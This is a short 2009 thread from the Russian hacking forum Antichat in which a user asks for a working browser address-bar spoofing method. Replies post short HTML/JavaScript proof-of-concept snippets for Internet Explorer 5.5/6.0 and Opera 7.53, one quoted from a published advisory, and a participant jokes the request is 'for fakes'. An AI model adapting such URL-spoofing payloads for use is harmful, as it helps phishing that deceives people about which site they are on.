Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Подмена адреса! (https://forum.antichat.xyz/showthread.php?t=100252)

kapadult 08.01.2009 23:21

Подмена адреса!
 
Люди, кто-нибудь знает РАБОЧИЙ метод подмены адресной строки (хотя бы в IE)??? Знаю, что вроде сейчас проканывает метод с attack.js, но я не очень-то врубаюсь как им нормально воспользоваться... Короче, буду ОЧЕНЬ благодарен за помощь...

kapadult 09.01.2009 09:32

Люди, ПОЗАРЕЗ нужно! Что никто не в теме??? :(

m0Hze 09.01.2009 09:44

Объясни что значит attacj.js, выложи или ссылку в студию.

ViP-K1LLeR 09.01.2009 10:14

Для IE 5.5, 6.0

Цитата:

<a href="http://microsoft.com"
onClick="document.write(unescape('%3cscript%3ewind ow.
location=%27http://google.com%27%3c/script%3e'))"
>Microsoft</a>

Для Opera <=v.7.53

Цитата:

<script
function fake() {
oc=window.open('http://www.opera.com/', '','location=1');
oc.location.replace('http://www.example.com');
}
</script>
<a href="javascript:void(0);"
onClick="fake()">http://www.opera.com/</a>

Astn 09.01.2009 10:43

Как я понял перенаправления чтоль адреса?

kapadult 09.01.2009 11:29

Чтобы в адресной строке был один адрес, а страница отображалась другая... Спуфинг так называемый...

Astn 09.01.2009 12:18

а всё понял, тока для чего тебе ето? и есть много статей про ето, "web програмирование"

GrinGoO 09.01.2009 12:25

Программа: Opera Web Browser 7.53, Build 3850

Уязвимость в Web браузере Opera в обработке javascript позволяет удаленному пользователю создать HTML, который подделает URL в адресной строке. Удаленный пользователь может создать HTML, содержащий javascript, который, когда будет загружен, отобразить другой URL в адресной строке.

Пример:

[script]
function fake() {
oc=window.open('http://www.opera.com/', '','location=1');
oc.location.replace('http://www.example.com');
}
[/script]
[a href="javascript:void(0);" onClick="fake()"]http://www.opera.com/[/a]


Источник: Xakep.ru

Не понял что тебе конкретно нужно.. ну вот что то нашёл.

kapadult 09.01.2009 12:36

Спасибо это то что надо!!! Но, мне бы такой баг на IE....

F1shka 09.01.2009 12:41

Для фейков батенька, для фейков?


Время: 22:41